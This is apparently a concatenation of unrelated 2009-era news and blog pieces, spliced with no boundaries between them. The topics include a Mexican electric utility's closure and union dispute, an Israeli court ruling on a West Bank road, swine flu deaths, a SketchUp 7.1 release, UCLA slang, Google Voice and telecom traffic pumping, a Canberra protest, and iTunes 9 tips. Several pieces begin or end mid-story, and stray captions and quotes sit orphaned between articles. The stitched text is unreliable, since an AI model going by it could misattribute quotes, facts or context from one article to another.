The utility had also been ensnared in a labor dispute between federal officials and a union representing Luz y Fuerza del Centro employees .
The Mexican Electricians Union , one of the most powerful in the country , represents about 60,000 workers .
" They have declared war and we are going to respond , exercising our constitutional rights and guarantees , let there be no doubt about that , " the union said in a statement Sunday .
Union supporters organized a protest march to the interior ministry Sunday to demand an audience with Gomez Mont .
Union leaders were not available for comment Sunday morning because all of the directors were participating in the march , a union employee told CNN .
The government cited labor rules imposed by the union as a cause of the inefficiency .
" Practically all of the decisions of Luz y Fuerza del Centro had to be taken to serve the demands of the union and not in the interests of the consumers , " Gomez Mont said .
Luz y Fuerza del Centro had sales of 730 megawatt - hours per worker , Gomez Mont said , compared to 2,500 megawatt - hours per worker for CFE .
The minister also said the union continued to grow its workforce to benefit itself and not the company 's operations .
CFE operates with one electricity distribution employee per 627 consumers ; LFC had one distribution employee per 291 users , Gomez Mont said .
The federal government will honor the terms of the collective bargaining agreement regarding the laid - off workers , he said , and will pay the pensions of retired employees .
The move does not signal a shift toward the privatization of electric utilities , Gomez Mont said .
Early this month , members of the Mexican Electricians Union demonstrated outside the president 's residence to demand recognition of their leader .
On Monday , the government refused to recognize Martin Esparza , alleging a fraudulent election process .
All About Mexico
FILE PHOTO : Smoke is seen following a fire at Aramco facility in the eastern city of Abqaiq
All lessons are formated as pdf files .
If you do not already have
Adobe Reader click on the Adobe icon to download a free version .
4:10 pm
Center for Biological Diversity
Land Speculator Michael Winer Wins 2009 Rubber Dodo Award
3:35 pm
Amnesty International - USA
Amnesty International Challenges Ayatollah Ali Khamenei on Freedom of Expression
3:33 pm
Americans United for Separation of Church and State
Pat Robertson ’s Christian Broadcasting Network Warns Americans of ‘ Demonic ’ Halloween Candy
3:32 pm
Common Cause
Corporate Democracy : Likely Fallout From Supreme Court Citizens United Decision
3:27 pm
National Gay and Lesbian Task Force
Article of Faith : Faith Leaders Support Marriage Equality in Maine
3:26 pm
National Parks Conservation Association ( NPCA )
National Parks Conservation Association Supports Legislation to Expand Service Opportunities in National Parks
3:22 pm
Human Rights Watch ( HRW )
Japan : Protect Burmese Rohingya Seeking Asylum
1:42 pm
National Low Income Housing Coalition
NHTF Campaign Applauds White House Announcement Promising $ 1 billion to Capitalize Trust Fund
1:38 pm
Constitution Project
Constitution Project Joins Coalition in Support of the USA PATRIOT Amendments Act of 2009
Inthe first ruling of its kind , Israel 's Supreme Court ordered the Israeli army on Thursday to allow Palestinians to travel on a West Bank road they had been banned from using .
The case , filed by the Association for Human Rights Israel ( ACRI ) on behalf of 22 Palestinian villages in the area south of Hebron , is being hailed by human rights activists as a victory in their battle against segregated roads in the occupied West Bank .
While most West Bank roads are open to both Israelis and Palestinians , a few major ones are closed to Palestinian traffic , leading critics to decry them as " apartheid " roads .
A spokeswoman for ACRI said that it was the first time that the Supreme Court had ever ruled on road closures imposed by the IDF ( Israel Defense Forces ) .
Following the outbreak of violence in the second intifada in September 2000 , the IDF closed roads in many areas in what it said was a move to protect Israeli citizens , including both Jewish settlers and passing Israeli motorists .
Approximately 10 of these roads remain closed , ACRI says .
" The Supreme Court never made a decision before relating to a particular place where Palestinians are banned from driving on a road just for being Palestinians , " said Nirit Moskovich of ACRI .
The group is disappointed , however , that the Supreme Court did not seize the opportunity to make a ruling on segregated roads in general , she added .
" In our petition , we put great emphasis on the fact that the entire notion of prohibiting public resources to people based on their ethnic or national identity is forbidden and should be outlawed , " Ms. Moskovich said .
" But the Supreme Court did not refer to that at all in their decision .
It was based on the circumstances of that particular case . "
The 29 members of the Jadallah family in the village of Beit Awa were a compelling example of the hardships caused by the policy .
They live adjacent to the road in question , Road 354 , which they have n't been allowed to use since 2001 .
That left the only route to and from the family homes over treacherous , unpaved mountain roads .
Older family members found it impossible to travel at all .
" It is hard to downplay the damage caused to the local residents , as clearly demonstrated by the petitioners , " the Supreme Court justices said in their ruling .
Israel 's Supreme Court is one of the country 's more liberal - minded institutions , and has often made rulings that are at odds with other spheres of power in the Israeli establishment .
Ten years ago , ACRI , The Public Committee Against Torture in Israel , and HaMoked : the Center for the Defense of the Individual , won a Supreme Court ruling that prohibits the use of torture by Israel 's security services .
The groups complain that the anti-torture ruling is regularly violated .
Thursday 's ruling is likely to provide additional pressure for the high court to decide on Road 443 , a larger and well - trafficked road also closed to Palestinians .
" Today 's ruling is particularly relevant as it may influence future court decisions on the legality of this separation regime , such as the notorious case of Route 443 .
ACRI submitted a petition against the segregation of this road and is awaiting a ruling , " Attorney Limor Yehuda said in a release .
" As such , it is alarming that Supreme Court President Dorit Beinish refers to the notion of proportionality in the present ruling and avoids confronting the principle at stake : the legality of Israel 's policy of segregation and discrimination in the West Bank . "
The army said in its petition that the closure order was issued to protect residents in the West Bank settlement of Negohot and other settlement outposts , where about 200 Israelis live .
The court gave the IDF three months to find another solution .
Sconestone Launches Round - the - World Kindness Movement
Warren MacLeod carved the " Sconestone " out of an African soapstone — and now he 's sent it off on a global mission of kindness .
How would you feel if someone gave you a gift , then said that you could only keep it for a week ?
If you ’re anything like Warren MacLeod ’s wife , Kari , you ’d be very honored .
Last Valentine ’s Day , MacLeod carved and painted a large soapstone from Africa , and named it the Sconestone .
He then presented it to his wife , telling her , “ This is an odd gift .
You ’re going to have it for a short while , then we ’re going to send it on , but it ’s in your honor , ” he told the Nova Scotia News .
So why the strange requirement ?
The Windsor , Nova Scotia man had decided that the Sconestone would serve as a symbol of kindness , and that it would inspire its possessor to do something nice for someone else before passing along the gift .
The stone ’s keepers are also encouraged to let friends and strangers touch the stone and commit to their own acts of generosity .
What ’s more , every act of kindness made in connection with the Sconestone will be recorded on a website reporting the gift ’s journey , Sconestone.com .
It ’s a kind of a pass - it - forward idea , but a little different in the sense that the obligation is a little more strong for someone to do something when there ’s a lump of stone put in your hand and someone tells you the world ’s watching , ” said MacLeod .
The Sconestone is kicking off its international journey with a trip to Scotland , courtesy of the Scottish band Runrig , which is launching the first official “ Sconestone ceremony ” at one of their concerts .
The band ’s business manager also requested that the MacLeods create brochures and a video , and that they purchase 10,000 glow - in - the - dark wristbands to send the stone off in style .
The couple borrowed $ 10,000 to cover the promotional costs , but they may recoup the costs and then some through sponsorships — in which case , the money they make will pay for even more acts of kindness .
Sconestone.com is registered as a non-profit , and MacLeod would distribute excess funds to other charitable groups .
“ If some guy starts a charity , or something like that , it would be great to push any money we get from sponsors on to them , if they ’re building a school or whatever it might be . ”
As for the Sconestone itself , it seems to have a long and exciting journey ahead of it .
Future keepers have “ started to organize themselves ; it ’s looking like it will make three continents before the end of September , ” said MacLeod ’s friend , Lori Cox .
Who knows ?
It may even show up at your door one day .
WASHINGTON ( Reuters ) -
The new pandemic of swine flu has killed 76 children in the United States since it emerged in April and is worsening , U.S. health officials said on Friday .
A child reacts as he receives the H1N1 swine flu vaccine in a nasal spray at Dodge Park Elementary School in Landover , Maryland , October 9 , 2009 .
REUTERS / Jonathan Ernst
But researchers are reporting some good news about vaccines that may smooth efforts to immunize people against the pandemic flu and ordinary flu at the same time .
Although it is not quite at epidemic levels yet , H1N1 is spreading in many states at a time when normally there is little or no influenza , the U.S. Centers for Disease Control and Prevention said .
Several studies reported this week show that most people , including children , who die from swine flu have underlying conditions making them more susceptible , but some who are healthy are also dying , the CDC said .
“ We saw a peak of pediatric deaths starting in April , May , June , ” the CDC’s Dr. Anne Schuchat told reporters in a telephone briefing .
“ It ’s starting to shoot up again . ”
The 76 deaths compare to 68 deaths from seasonal influenza from September 2008 to April 2009 , the CDC said .
Many of the children who have died had neurological conditions such as muscular dystrophy or cerebral palsy , the CDC said .
The CDC is trying to roll out vaccines against swine flu at the same time as an usually early campaign of vaccinating against seasonal influenza .
Officials predicted some bumps in the road and there have been some , with some counties suspending seasonal vaccination to make room for H1N1 vaccines .
But a new report suggests it may be easier to do this .
Trials show that giving an H1N1 shot at the same time as a seasonal influenza shot causes no problems and people are fully protected , said Dr. Anthony Fauci of the U.S. National Institute of Allergy and Infectious Diseases .
Early results from trials of adults show those who got both shots at the same time had good immune responses to the vaccine , Fauci told the briefing .
The CDC said 6.8 million doses of H1N1 influenza vaccine were now available for states to order -- much of it AstraZeneca unit MedImmune ’s nasal spray vaccine , which is approved for healthy people aged 2 to 49 .
States have placed orders for 3.7 million doses .
Orders are placed only when there are hard and fast plans for administering the vaccine .
Many states are vaccinating either healthcare workers or children first against H1N1 -- both are in the CDC - designated “ priority groups ” for vaccine .
Schuchat said some doctors wrongly believed that healthcare workers should not get the nasal spray but only those working with severely immune system - compromised patients , such as those getting bone marrow transplants , should avoid it , she said .
CDC officials also expect 114 million doses of seasonal flu vaccine within the coming weeks .
“ More than 77 million doses have gone out and more is on the way .
Manufacturers have readjusted their timelines for delivery of seasonal flu vaccine due to production of 2009 H1N1 vaccine , ” CDC spokesman Tom Skinner said by email .
“ It will take several weeks to get the full supply going , ” Schuchat added .
CDC monitoring shows that 6.1 percent of all deaths in the last week of September were due to pneumonia and influenza -- just below the threshold for an epidemic , which is 6.4 percent of deaths .
More than 99 percent of confirmed flu cases are the new pandemic H1N1 virus .
Fall is just around the corner here in Boulder , and with it comes our next release of Google SketchUp ( cue the bugling elk ) .
The team 's been working long hours through the summer on projects large and small .
I 'm proud to announce that Google SketchUp 7.1 is available today for you to download and install .
Do n't you just love the smell of fresh new software ?
Even though we 're calling this a " point " release ( you lucky Pro 7.0 users will get this update for free ! ) , Google SketchUp 7.1 includes a lot more than just minor tweaks and bug fixes .
We 've added a batch of new features and functionality that make SketchUp ( and LayOut 2.1 in SketchUp Pro ) even more useful for everyone .
Here 's some of what 's new :
Large Model Handling
We overhauled SketchUp 's rendering engine to make it easier to work with big models .
With the right setup , operations like orbiting , zooming and drawing are quicker and smoother .
Of course , how much quicker depends entirely on factors like your computer 's configuration and the specific model you 're working on .
For most people , most of the time , SketchUp should feel snappier when they 're working with lots of geometry .
Have a look at this article to find out how to take advantage of the improvements we made .
Better File Exchange
One of the things we 're pretty concerned about around here is something called data liberation .
Too often , your stuff 's locked inside proprietary file formats that force you to use whatever tool you used to create it .
We do n't think that 's right , so we 're doing what we can to make it easier to move your data around .
COLLADA is a 3D file format based on open standards ; it makes it easier to move your models between different pieces of software .
KMZ is the standard file format for packaging 3D models together with information about their geographic locations .
SketchUp 7.1 can import and export COLLADA and KMZ files , which should go a long way toward letting you do whatever you like with your data .
Modeling in Context
Whether you 're building photo - textured , geo- located models that are headed for Google Earth , or just trying to cobble together some context for a design proposal , you should be interested about the stuff I talk about in this short video :
Get Photo Texture gives you direct access to Google Maps Street View imagery from right inside SketchUp .
You can use panoramic , street - level photography we 've gathered to photo - texture your models .
It 's spooky - cool .
Nearby Models lets you use the Component Browser to search the 3D Warehouse for buildings located near the one you 're working on .
Bringing in a geo-location snapshot first tells SketchUp where to look .
Upload Component provides a shortcut for uploading parts of your model to the 3D Warehouse without having to save them out as separate files first .
This is handy if you 're modeling several buildings on the same block ; it 's also useful for preserving the functionality of Dynamic Components when you upload them .
Dimensioned Drawings in Google SketchUp Pro
We 've given SketchUp Pro a big upgrade in this release ; it 's specially targeted at those of you who need to make professional design documents to communicate your work to clients and partners .
LayOut 2.1 ( included in SketchUp Pro 7.1 ) now includes a simple but surprisingly powerful tool for dimensioning models and creating dimensioned drawings .
There 's a bunch more to talk about in LayOut 2.1 , but we 'll save that for another blog post tomorrow .
... and if that 's not enough , have you got an idea for what we should do next ?
In earlier days , we used to be able to talk to everybody who was using SketchUp .
Every week , well over a million of you are using SketchUp , and it 's getting really hard to remember all of your names – much less the new features you 'd like us to build .
For this release , I 've put up a shiny new Google SketchUp Product Ideas page that you can use to let us know what you think we should build next .
Do n't hold back – I 'm listening , and I 'll respond formally to ( at least ) the top ten ideas you post .
And if you just want to talk about SketchUp , please head on over to the Help Center where you 'll see that we 've done a big upgrade on our discussion forums .
| |
Sister from another mister .
Off the hezzie .
Recessionista .
Bromance .
When you hear undergraduates utter these and other bewildering words and phrases , are you suddenly overcome with FOMO ?
Now , I do n't want to get all up in your biznatch -- that is , to meddle in your business .
But if the answer to the question is " full - on , " you might want to check out the latest edition of " U.C.L.A. Slang . "
Produced every four years in conjunction with an undergraduate linguistics course , the dictionary has become an institution at UCLA , where the slim volume with a yellow cover has been providing " eargasms " since 1989 .
With more than 1,000 entries , " U.C.L.A. Slang 6 " aims to serve as the latest word on slang used on the Westwood campus that -- if students are correct -- is " Under Construction Like Always . "
In addition to being used on campus , successful submissions had to be unlikely to appear in a conventional dictionary .
If the words and phrases also had the potential to puzzle parents , so much the better .
" I tell my students , 20 years from now , you 're still going to be using this slang , " said Pamela Munro , the dictionary 's founding editor and a UCLA professor of linguistics .
" You 're going to learn some new words but you 're still going to be using these words and phrases , and people are going to think it dates you , because it will . "
Munro added , " People in general are very creative and come up with lots of wonderful new words that may or may not catch on , and our goal is to capture the vivid , colloquial words and phrases associated with a specific subculture -- UCLA students . "
But thanks to the role that the entertainment industry plays in introducing and spreading slang , the dictionary may actually capture more .
" Slang seems to originate on the West Coast and move east because of Hollywood and the recording industry , " said Munro , a noted authority on dictionary creation .
" So ' U.C.L.A. Slang ' tends to be a harbinger of slang that already is -- or soon will be -- spoken across the country . "
For something so irreverent and lighthearted , " U.C.L. A Slang " is the product of a surprisingly regimented process .
With each version , student contributors start from scratch , collecting potential entries from casual conversations with friends and fellow students , Munro said .
The whole class discusses submissions entry by entry , working out a consistent way of analyzing the words and presenting entries , refining definitions and indicating usage , and clarifying examples , spelling and pronunciation .
" Students learn a lot about grammar , language and linguistics , " said Munro , whose credits include dictionaries in Zapotec , Chickasaw and Wolof .
" You can study anything you want about ordinary language through the medium of slang . "
The 160 - page volume , complete with terms , definitions , parts of speech , sample sentences , usage notes and the etymology of words and phrases , provides a glimpse into how language in general and slang in particular form and evolve .
" Schwa " -- a synonym for " wow " -- exemplifies the rarest approach to slang creation : pulling new words out of thin air , Munro said .
" Most slang employs language already in use in the mainstream , " she said .
" A subgroup merely assigns a new meaning to an existing the word or phrase . "
" Destroy , " for instance , means the opposite of what you would think : to do well on something like a test , according to " Slang 6 . "
And the phrase " dropping the kids off at school " has a scatalogical rather than an educational meaning .
Nouns mysteriously become verbs , as in " napster , " now slang for the verb " to interrupt , " and verbs morph into nouns , as in " epic fail , " now slang for " what a mistake ! "
Nouns also become adjectives , with " Obama " now used as slang for " cool or rad , " as in :
You just aced that exam -- you are so Obama !
Borrowing words from other languages is also an option .
" Mija , " which is Spanish for " my daughter " and slang for female friend , and " papi chulo , " Spanish slang for male friend , made the grade for the first time in " Slang 6 . "
The lingo of texting provided such visual entries as " QQ , " an emoticon similar to a smiley face that , in this instance , stands for the verb " to cry . "
Rhyming helps phrases like " sisters from another mister " and " brothers from another mother " -- slang for friends so close they seem like siblings -- catch on and spread , Munro explains .
When only a new word will do , blending -- that is , adding the beginning of one word to the end of another word -- is a common approach , Munro said .
For example , " bromance " ( brother + romance ) is slang for an extremely close platonic friendship .
Other blended confections from " Slang 6 " include the noun " recessionista , " a penny - pinching turn on " fashionista " ( slang for " fashion maven " in flusher times ) , and " eargasm , " which blends " ear " and " orgasm " to describe the sensation of hearing a beautiful sound .
Abbreviation is another gold mine , Munro said .
Clipping -- cutting a syllable or two from a commonly accepted word -- produces words like the verb " presh , " short for precious , and the adjective " bellig , " which rhymes with fridge and is short for belligerent and drunk .
Taking the first initials of a common phrase can result in a catchy initialism such as I.D.K. , which is slang for " I do n't know . "
Once those initials start being pronounced as a full blown word , they 've evolved into an acronym like FOMO , which rhymes with " majordomo " and stands for " fear of missing out . "
What Munro calls " reverse alphabetism , " meanwhile , repurposes initials to provide a new , amusingly apt definition for widely accepted initialisms such as " Under Construction Like Always " for UCLA or " University of Spoiled Children " for USC , UCLA 's cross - town rival .
Neither is new , but both are still in use , thus their place in " Slang 6 . "
In fact many of the dictionary entries will feel familiar and comfortable .
Mom and Dad need feel no pressure to forego " cool " for " off the hezzie , " " off the hook " or any other new fangled expression for youthful enthusiasm that debut in " U.C.L.A. Slang 6 . "
" ' Cool ' is still in there , " Munro said .
" Cool is one of those words where everybody knows the word , but still thinks it 's slang . "
###
For press copies of " U.C.L.A. Slang 6 , " contact Meg Sullivan at 310-825-1046 .
The public may order copies by visiting www.linguistics.ucla.edu/faciliti/opl.htm, calling 310-825-0634 or contacting the UCLA Department of Linguistics at 3125 Campbell Hall , Box 951543 , Los Angeles , Calif .
90095-1543 .
Google is not a happy camper about a recent Federal Communications Commission ( FCC ) request for details about its Google Voice feature , sent to the company on Friday .
But the search engine giant is n't directing its ire at the FCC ; it 's going after the telco that raised a ruckus about the voicemail application 's call restrictions .
" AT&T apparently now wants web applications — from Skype to Google Voice — to be treated the same way as traditional phone services , " Google attorney Richard Whitt wrote on his policy blog on Friday .
" Their approach is what a former FCC chairman has called ' regulatory capitalism , ' the practice of using regulation to block or slow down innovation . "
The quote comes from ex-FCC Chair William Kennard , who argued that this kind of capitalism is triggered " when companies invest in lawyers , lobbyists , and politicians , instead of plant , people , and customer service . "
But however you want to classify it , the Commission has indeed asked for details on Google Voice .
The letter 's key questions focus on the fact that Google Voice blocks certain calls to certain areas .
" How does Google identify the telephone numbers to which it restricts calls ? " the inquiry asks .
" Why does Google Voice restrict calls to these numbers ? "
Blocking specific calls is something that AT&T grumbles it would also like to do , but can't because of the FCC's " common carrier " rules .
" No fair , " the telco yelped in late September ; if the FCC really believed in net neutrality , it would make Google do what traditional phone services have to : complete calls to everywhere .
Critics have called the protest a total " red herring . "
Google Voice is n't an ISP or common carrier , it 's an application , they note .
It does n't carry phone calls along its own network .
Still , some AT&T skeptics argue that a Google Voice probe is a useful endeavor , even if it has nothing to do with common carrier or Internet non-discrimination .
" The Commission is starting down a worthwhile path to examine the changing nature of today 's telecommunications service , " Public Knowledge 's Gigi Sohn declared .
So what exactly is this call - blocking stuff all about ?
Welcome to the sleazy world of " traffic pumping . "
Pump up the volume
All this static comes from a medium - to - big fight AT&T , Verizon , and Qwest had in 2007 with a bunch of smaller carriers over " traffic pumping , " or " access stimulation " as it is more politely called .
The FCC 's intercarrier compensation rules require the big telcos to pay the smaller carriers certain access fees to complete calls through their often rural networks .
That 's reasonable because making rural phone service profitable is often an uphill battle , but there are some pretty sweet ways for small services to game the system .
Verizon outlined the mischief in a June 2007 letter of complaint to the FCC .
Here 's how the scheme works :
You , the Local Exchange Carrier , get chat - line providers and conference call companies to advertise free or low - cost services with call numbers that terminate in your area ( everybody in this debate is always very circumspect about what kind of , ahem , " chat , " we 're talking about here except Google , which titled its latest blog post " Sex , conference calls , and outdated FCC rules " ) .
Then you charge hefty intercarrier compensation rates to Verizon or AT&T to complete the calls to your neck of the woods .
Then you kick back some of the intercarrier comp loot to your conference call / chat line buddies .
" This creates a windfall for both sets of entities , " Verizon complained .
" Providing excess access revenues to the LEC while sustaining an artificial business model for the conference and chat - line providers . "
AT&T was particularly peeved at a band of smaller competitive carriers in rural Utah , all allegedly working in cahoots with the incumbent local carrier Beehive Telephone Company .
According to AT&T , Beehive 's largely desert service area consists of around 1,200 legit phone lines .
" It is difficult to conceive of a locale that would be less attractive to a genuine competitor , " the telco charged .
But somehow a set of companies offering free chat line / conference deals , billed over 200 million minutes of intercomp traffic to AT&T .
" That these [ competitive carriers ] were created for the express purpose of engaging in traffic pumping is underscored by the fact that traffic pumping appears to be their only business , " AT&T noted .
In fact , since their creation , nobody has ever actually made a phone call from the service areas of two of these companies , AT&T charged .
Ain't that America
But some of the companies about which AT&T , Verizon , and Qwest have complained have brazenly pooh - poohed these concerns .
There 's nothing illegal about traffic pumping , noted lawyers for the All American Telephone Company and five other carriers in their response to the Commission .
" Indeed , discovering new ways of generating increased telecom traffic is what telecom carriers do , and what they have always done , " they note .
" We are unaware of any finding by this Commission , or any regulatory commission , that telecom carriers are generating ' too much ' traffic . "
When rural carriers set up help desk style call centers " in areas that are desperately seeking to stimulate job growth , is that ' illegal traffic pumping ' ? "
All American et al 's letter rhetorically asked .
" Or is it a valuable means of bringing jobs to rural communities that need them ? " ( the filing did n't say much about the job stimulating qualities of chat services ) .
And hey , AT&T engages in pumping too , they charged :
" When AT&T Mobility entered into an arrangement with American Idol to provide the
service that allows viewers to vote for their favorite vocalist by text message or cell phone call , the teaming was described in the media as : ' This high volume application will be the first major wireless interactive TV tie - in ever seen in the U.S. '
Does this constitute an ' illegal traffic pumping scheme ' ?
Or is AT&T exploiting a new service application designed to increase both its service and access revenues ? "
Do n't help yourself
As the froth over these questions rose , the FCC issued a Declaratory Ruling advising the big telcos that , although the Commission understood that there were some problems to address here , they should not resort to " self - help " measures like blocking calls to select areas .
No carriers " may block , choke , reduce or restrict traffic in any way , " the agency reiterated .
Later in 2007 the agency launched a Notice of Proposed Rulemaking on how to deal with the access stimulation problem .
The FCC " tentatively " concluded that a local exchange carrier that " shares revenue , or provides other compensation to an end user customer , or directly provides the stimulating activity , and bundles those costs with access " was violating the Commission 's rules .
But there has n't been much movement on this issue since the FCC extended the deadline for comments on the proceeding into mid-January of last year — the administration of former FCC Chair Kevin Martin deadlocking on intercarrier compensation questions almost across the board .
So it appears that Google Voice has gotten caught in the cross hairs of a long - standing and intractable issue that the big telcos would very much like resolved .
It may indeed be that AT&T is engaging in a bit of " regulatory capitalism , " but that 's probably not the worst kind of capitalism compared to jacking up your incoming call revenue by arbitraging the FCC 's intercarrier comp system .
" This issue has nothing to do with network neutrality or rural America , " even Google concedes .
" This is about outdated carrier compensation rules that are fundamentally broken and in need of repair by the FCC . "
The connection to net neutrality may be dubious , but by linking the traffic pumping problem to Google Voice , AT&T has succeeded in getting the issue on the regulatory front burner .
Two people have been arrested after scaling the forecourt roof of Parliament House in Canberra to unfurl a banner protesting against logging in Tasmania 's old - growth forests .
The man and woman were watched by a large crowd at the entrance to Parliament as they unfurled the banner , which read " Tasmania 's ancient forests - world heritage , not wood chips " .
The banner was attached to the coat of arms on the roof at the front of Parliament .
The protesters said they were aiming to send a clear message to the Rudd Government that logging of old - growth forests in Tasmania must end .
" Tasmania 's ancient forests are not for sale , particularly for woodchips for the export market , " the male protester said before abseiling back to the ground .
About a dozen police watched on as the protesters took 40 minutes to unfurl the banner before moving in to arrest the pair after they descended from the roof .
" Woodchipping is a plague on Tasmania 's wilderness , " the male protester said as he was led away by police .
A spokeswoman for the protesters , Lisa Stone , said the protest was part of a national day of action to highlight the damage being done to Tasmania 's old - growth forests .
" We want the Government to call a halt to industrial logging of Tasmania 's ancient forests , " she said .
- AAP
Roberts " never lived Disney down , " said Christopher Marangi , an equity analyst with Gabelli & Co. Inc .
" He surprised everybody with it , " Marangi said .
" From that point forward , there has always been the question as to what he would do with the cash from the cable business . "
One perfect moment DCAU Luthor
Superman Adventures # 41 was unsual inasmuch as it featured 22 one - page stories rather than one 22 page story .
This is one of my favourites .
It 's safe to say that I never once imagined I 'd be reading Luthor and Mercy dialogue and expecting a " Narf ! " or " Zort ! " , but it works rather well , no ? :)
And if anyone would care to post the Alan Moore Swamp
Thing sequence where Luthor is hired for ten minutes by a consortium of bad guys who want Swamp
Thing out of the way , and devises a method in nine and a half minutes , because he wanted to be sure to leave them enough time to sign the cheque for his fee , that would be an awesome moment too ! :)
If you do n’t already spend countless hours of the day browsing Reddit , it ’s never too late to start .
What I think sets Reddit apart from other similar communities is the discussion - only sections .
More recently , a new section dubbed “ IAmA ” – short for “ I am a…ask me anything ” – has taken off by storm by allowing interesting and sometimes notable people ( under the cover of anonymity if they wish ) to answer random questions from complete strangers .
As dubious as this may sound , it actually works quite well and have since brought under the spotlight award - winning musicians , hackers , descendants of Nazis , 9/11 firefighters , lottery millionaires and of course , the most interesting of them all , Microsoft developers .
So far , three anonymous Microsofties have already stepped forward to answer several hundred questions in total .
One worked on Windows Vista and Windows 7 ( and will also be working on Windows 8 ) , another is a 10 - year Office veteran , and the latest is a junior Windows developer who wrote two lines of code that shipped in Windows 7 .
Like most anonymous postings , what ’s valuable is the honest insight into the politics , technicalities and thought process behind the scenes at Microsoft .
Here ’s just a slice of some of the most interesting responses I ’ve come across so far .
“ One more question : how much info does Microsoft have on us ? ” ( #)
Almost none .
Any data that gets collected ( including data from WGA and elsewhere ) is EXTENSIVELY filtered for PII ( Personally Identifiable Information ) .
If any data ever got through to somewhere it did n’t belong , like an email address , social security number , or credit card number , we would consider that to be a very serious bug and would place a very high priority on making sure we never recieved that data again .
In general , any data that we collect from users ( and this includes our advertising ) is impossible to link back to a unique person .
I ’ve worked with our privacy and legal teams on this stuff before , and they are deadly serious about it .
“ Are you guys even thinking about the next os ?
or are you more focused on continuing to improve this one , update , service packs , etc ? ” (#)
Planning for “ Windows 8 ” ( the next version ) has consumed all of our time for the past few months .
It ’s amazing to see how much work goes into just planning the OS .
Do you get to see other peoples code ?
I mean : is there some kind of version control used for the entire Windows branch , or is it more like : “ I code my stuff and use compiled objects for the stuff I do n’t need to know about ” ? (#)
Anyone who is working on windows can see the entire windows source base .
Technically , anyone with access can compile the entire OS down to an ISO .
Realistically almost no one does because it takes a ridiculous amount of time to do .
“ The [ Windows 7 ] leaks seem obviously intentional . . . otherwise we ’d see leaks of other major software all the time , which we do n’t — not even other Microsoft software .
Please explain how I ’m missing the point — why is there “ not a lot we can do ” ? ” (#)
Most other major software does n’t have nearly as many people working on the project or with access to daily builds .
Last time I checked we have something like 6000 people and even more that have access to the builds .
I ’d guess that 10,000 people have access to our builds .
Any time you have that many people with access to something …
It ’s going to leak .
But yeah , there are probably some positive benefits to it .
We ’re definitely not leaking intentionally ( and if we are , they certainly have n’t told me about it ) .
If you like what you ’re seeing , head over to the original discussions to read lots more .
Of course , if there ’s also something on your mind you want to ask you can also submit a question .
Hopefully these guys ( and others ) are still around to respond to them .
i Tunes 9 has been out for a little while now , so here is a collection of tips and tricks that are new in this version .
1. Nested rules for smart playlists
As well as the plus and minus buttons for adding multiple rules to a smart playlist , there is now an ellipsis button for adding nested rules .
Whereas before you could only set it to match any or all of the rules , now you can make more complex rule combinations .
For example , you could set the first rule , then add two rules at the first nested level by clicking the ellipsis button and then the nested plus button .
By then setting the top level to match all rules , and the nested level to match any rules , it will find songs that match both the first rule and either of the two nested rules .
2. Automatically Add to iTunes folder
i Tunes stores all of your music inside the iTunes Music ( or iTunes Media if you have n't had a previous version of iTunes ) located inside the Music folder in your user folder .
There is a new addition inside the iTunes Music folder called " Automatically Add to iTunes " .
Anything that you drop into this folder will be added to iTunes next time it opens , or instantly if it is already open .
This folder is n't in a very convenient place , so to use it properly you will want to drag it to the Dock or Finder sidebar , or create an alias on the desktop by holding Command and Option and dragging it .
Another great use for this is for copying music across a network to another Mac .
Instead of having to go over to the receiving Mac and opening up iTunes to import the music , you can just drop the files in this folder directly from the sending Mac .
3. Organise the iTunes Media folder
The disorganisation of the iTunes Music folder really shows how iTunes has far outgrown its original purpose .
Every time Apple has added a new feature , things have become more muddled .
Up until now , Movies , TV Shows , Audiobooks and Ringtones etc. have been added as subfolders of the Music folder , which does n't really make sense .
To fix this , you can choose “ Organize Library ” under “ Library ” in the File menu .
In the window that appears , click “ Upgrade to iTunes Media organization ” and when you click OK , iTunes will sort out the mess in your iTunes Music folder .
You will now have an iTunes Media folder , with subfolders for Music , Movies , Apps , TV Shows etc .
There is one reason you might want to avoid doing this however .
Your next Time Machine Backup will probably take a long time , depending on the size of your media library .
4. Customize the column browser
The column browser in iTunes 9 is better than ever .
You can enable it by choosing Show Column Browser from the View menu or by pressing Command - B .
The new features that allow you to customise it are located in the Column Browser submenu of the View menu .
You can position it to the top or to the side of the main music list , and you can choose which columns appear from Genre , Artist , Album , Composers , and Groupings .
Each playlist can also have its own browser .
Apple have demonstrated this by adding a " Classical Music " playlist which has the Composer and Grouping columns , for those who group their music by Composer or Symphony rather than by Artist and Album .
5. Edit your iPhone 's app screen
There is a new page for managing which Apps you want to sync to your iPhone and how you want to position them on your iPhone .
When you have your iPhone or iPod Touch plugged in , just click on it in the sidebar and then go to the Applications tab .
It 's fairly basic , but it 's still loads quicker than organising your apps on the iPhone device .
There are two major benefits : Firstly , you can drag and entire screen of apps in the list on the right to change the ordering on the screen .
Secondly , you can hold Command when clicking apps to select more than one at a time and move them all together .
6. Different way to access the mini player
When you first download iTunes 9 , you might think that the mini player is gone .
Clicking the green zoom button in the top left now just changes the size of the itunes window instead of changing to the mini player .
Now you have to hold Option when clicking the green button to get the old behaviour back .
Update :
This appears to have changed back to normal with the iTunes 9.01 upgrade .
If you liked the new 9.0 behaviour , simply use the following Terminal command to change it back :
defaults write com.apple .iTunes zoom - to - window - bool YES
7. Make Genius Mixes appear
One of the best new features in iTunes 9 is Genius mixes , a collection of ready made playlists that iTunes creates by analysing your music library .
Unfortunately , it does n't always appear right away .
If you can't find Genius Mixes in the sidebar , choose " Update Genius " from the Store menu and it should appear .
8 . The shopping cart is gone
If you had the iTunes store set up to add items to a shopping cart instead of buying straight away , unfortunately the shopping cart is now gone .
It has been replaced by a Wish List , which works in pretty much the same way .
Just click the arrow to the right of " Buy Now " and select " Add to Wish List " .
Also , in theory , all the items from your shopping cart should have moved over into your wish list .
9 . Home sharing
The new home sharing feature allows you to actually share your music between computers , rather than just stream it across the network .
This makes it a lot more easier to transfer your purchases between computers without having to use flash drives or email attachments .
When iTunes is open on other computers on the network , they will show up in the sidebar .
Simply click on them , then choose any songs to transfer to your computer .
This works with any media type including Movies and TV Shows , and it does n't matter if the media was purchased from iTunes or not .
On top of that , you can filter the list to only songs that you do n't already have in your library , and you can set iTunes to automatically copy across any new songs that are purchased on the other computer .
However , things become a bit more complicated if you use multiple iTunes Store accounts ( i.e. a different one for each computer ) .
The iTunes Store does n't have to be logged into the same account on both , but Home Sharing does have to be set up with the same account .
If you find it is n't working , turn Home Sharing off and then on again from the Advanced menu .
Then re-enter the iTunes Store account username and password , making sure you use the same account on each computer .
